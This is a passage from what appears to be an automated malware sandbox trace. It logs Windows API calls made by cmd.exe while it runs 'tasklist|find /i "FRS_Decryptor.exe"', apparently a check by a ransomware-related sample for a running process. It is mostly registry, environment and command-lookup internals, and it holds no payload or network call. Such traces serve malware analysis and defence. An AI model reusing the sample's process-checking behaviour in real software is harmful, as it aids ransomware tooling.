lpcbData=0xf0ee38*=0x1000) returned 0x2 [0093.670] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x1, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.670] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x0, lpData=0xf0ee40*=0x1, lpcbData=0xf0ee38*=0x1000) returned 0x2 [0093.670] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x0, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.670] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x9, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.670] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x9, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.670] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x0, lpData=0xf0ee40*=0x9, lpcbData=0xf0ee38*=0x1000) returned 0x2 [0093.670] RegCloseKey (hKey=0x44) returned 0x0 [0093.670] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50088 [0093.670] srand (_Seed=0x5aa50088) [0093.670] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0093.670] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0093.670] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0093.670] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13e40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0093.670] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.670] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.670] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0093.670] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.670] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.670] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0093.670] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0093.670] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0093.670] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0093.670] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0093.670] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0093.670] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0093.670] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0093.670] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf0fc14 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0093.670] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xf0fc14, lpFilePart=0xf0fc10 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0fc10*="Desktop") returned 0x1c [0093.670] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0093.671] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf0f990 | out: lpFindFileData=0xf0f990) returned 0x13e42d8 [0093.671] FindClose (in: hFindFile=0x13e42d8 | out: hFindFile=0x13e42d8) returned 1 [0093.671] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xf0f990 | out: lpFindFileData=0xf0f990) returned 0x13e42d8 [0093.671] FindClose (in: hFindFile=0x13e42d8 | out: hFindFile=0x13e42d8) returned 1 [0093.671] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0093.671] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xf0f990 | out: lpFindFileData=0xf0f990) returned 0x13e42d8 [0093.671] FindClose (in: hFindFile=0x13e42d8 | out: hFindFile=0x13e42d8) returned 1 [0093.671] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0093.671] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0093.671] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0093.671] GetEnvironmentStringsW () returned 0x13e6190* [0093.671] FreeEnvironmentStringsA (penv="=") returned 1 [0093.671] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0093.672] GetConsoleOutputCP () returned 0x1b5 [0093.672] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0093.672] GetUserDefaultLCID () returned 0x409 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf0fd40, cchData=128 | out: lpLCData="0") returned 2 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf0fd40, cchData=128 | out: lpLCData="0") returned 2 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf0fd40, cchData=128 | out: lpLCData="1") returned 2 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0093.672] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0093.672] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0093.673] GetConsoleTitleW (in: lpConsoleTitle=0x13e4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0093.673] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0093.673] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0093.673] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0093.673] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0093.674] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0093.674] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0093.674] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0093.674] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0093.674] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0093.674] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0093.674] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0093.675] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0093.675] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0093.675] _wcsicmp (_String1="IF", _String2="find") returned 3 [0093.675] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0093.675] _wcsicmp (_String1="REM", _String2="find") returned 12 [0093.675] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0093.676] _pipe (in: _PtHandles=0x13e51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x13e51f0) returned 0 [0093.676] _dup (_FileHandle=1) returned 5 [0093.676] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0093.676] _close (_FileHandle=4) returned 0 [0093.676] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0093.676] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0093.676] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0093.676] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0093.676] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0093.676] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0093.676] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0093.676] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0093.676] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0093.676] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0093.676] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0093.676] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0093.676] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0093.676] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0093.676] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0093.676] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0093.676] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0093.676] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0093.676] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0093.676] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0093.676] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0093.676] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0093.676] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0093.676] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0093.677] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0093.677] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0093.677] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0093.677] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0093.677] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0093.677] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0093.677] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0093.677] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0093.677] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0093.677] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0093.677] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0093.677] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0093.677] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0093.677] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0093.677] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0093.677] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0093.677] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0093.677] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0093.677] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0093.677] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0093.677] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0093.677] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0093.677] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0093.677] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0093.677] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0093.677] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0093.677] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0093.677] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0093.677] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0093.677] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0093.677] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0093.677] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0093.677] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0093.677] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0093.677] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0093.677] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0093.677] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0093.677] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0093.677] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0093.677] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0093.677] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0093.677] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0093.677] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0093.677] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0093.677] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0093.677] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0093.677] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0093.677] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0093.677] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0093.677] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0093.677] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0093.677] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0093.677] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0093.677] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0093.677] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0093.677] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0093.678] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0093.678] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0093.678] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0093.678] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0093.678] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0093.678] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0093.678] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0093.678] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0093.678] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0093.678] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0093.678] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0093.678] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0093.678] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0093.678] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0093.678] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0093.678] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0093.678] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0093.678] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0093.678] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0093.678] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0093.678] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0093.678] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0093.678] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0093.678] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0093.678] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0093.678] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0093.678] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0093.678] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0093.678] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0093.678] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0093.678] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0093.678] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0093.678] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0093.678] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0093.678] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0093.678] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0093.678] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0093.678] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0093.678] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0093.678] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0093.678] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0093.678] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0093.678] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0093.679] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0093.679] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0093.679] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0093.679] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0093.679] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0093.679] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0093.679] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0093.679] SetErrorMode (uMode=0x0) returned 0x0 [0093.679] SetErrorMode (uMode=0x1) returned 0x0 [0093.679] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x13e5228, lpFilePart=0xf0fb9c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0fb9c*="Desktop") returned 0x1c [0093.679] SetErrorMode (uMode=0x0) returned 0x1 [0093.679] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.679] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0093.683] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.683] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0xffffffff [0093.684] GetLastError () returned 0x2 [0093.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0x13e5530 [0093.684] FindClose (in: hFindFile=0x13e5530 | out: hFindFile=0x13e5530) returned 1 [0093.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0xffffffff [0093.684] GetLastError () returned 0x2 [0093.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0x13e5530 [0093.684] FindClose (in: hFindFile=0x13e5530 | out: hFindFile=0x13e5530) returned 1 [0093.684] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0093.684] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0093.684] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0093.684] SetErrorMode (uMode=0x0) returned 0x0 [0093.684] SetErrorMode (uMode=0x1) returned 0x0 [0093.684] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x13ea3c0, lpFilePart=0xf0f944 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0f944*="Desktop") returned 0x1c [0093.684] SetErrorMode (uMode=0x0) returned 0x1 [0093.685] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.685] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0093.685] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.685] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.685] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0xffffffff [0093.685] GetLastError () returned 0x2 [0093.685] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0x13e5628 [0093.685] FindClose (in: hFindFile=0x13e5628 | out: hFindFile=0x13e5628) returned 1 [0093.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0xffffffff [0093.685] GetLastError () returned 0x2 [0093.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0x13e5628 [0093.685] FindClose (in: hFindFile=0x13e5628 | out: hFindFile=0x13e5628) returned 1 [0093.685] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0093.685] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0093.685] GetConsoleTitleW (in: lpConsoleTitle=0xf0fbcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0093.686] InitializeProcThreadAttributeList (in: lpAttributeList=0xf0faf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf0fadc | out: lpAttributeList=0xf0faf8, lpSize=0xf0fadc) returned 1 [0093.686] UpdateProcThreadAttribute (in: lpAttributeList=0xf0faf8, dwFlags=0x0, Attribute=0x60001, lpValue=0xf0fae4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf0faf8, lpPreviousValue=0x0) returned 1 [0093.686] GetStartupInfoW (in: lpStartupInfo=0xf0fb30 | out: lpStartupInfo=0xf0fb30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x34c, hStdError=0x2c)) [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", 